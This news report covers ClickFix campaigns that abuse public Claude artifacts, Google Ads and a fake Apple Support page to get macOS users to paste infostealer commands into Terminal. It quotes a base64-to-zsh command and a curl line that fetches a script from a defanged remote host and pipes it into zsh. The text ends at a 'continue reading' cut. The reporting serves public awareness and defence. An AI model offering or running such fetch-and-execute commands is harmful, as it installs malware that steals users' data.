Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries.
At least two variants of the malicious activity have been observed in the wild, and more than 10,000 users have accessed the content with dangerous instructions.
A Claude artifact is content generated with Antropic’s LLM that has been made public by the author. It can be anything from instructions, guides, chunks of code, or other types of output that are isolated from the main chat and accessible to anyone via links hosted on the claude.ai domain.
An artifact's page warns users that the shown content was generated by the user and has not been verified for accuracy.
Researchers at MacPaw's investigative division, Moonlock Lab, and at ad-blocking company AdGuard noticed the malicious search results being displayed for multiple queries, like “online DNS resolver,” “macOS CLI disk space analyzer,” and “HomeBrew.”
Malicious HomeBrew search results
Source: AdGuard
Malicious results promoted on Google Search lead to either a public Claude artifact or a Medium article impersonating Apple Support. In both cases, the user is instructed to paste a shell command into Terminal.
In the first variant of the attack, the command given for execution is: ‘echo "..." | base64 -D | zsh,’
while in the second, it’s: ‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’ .
... continue reading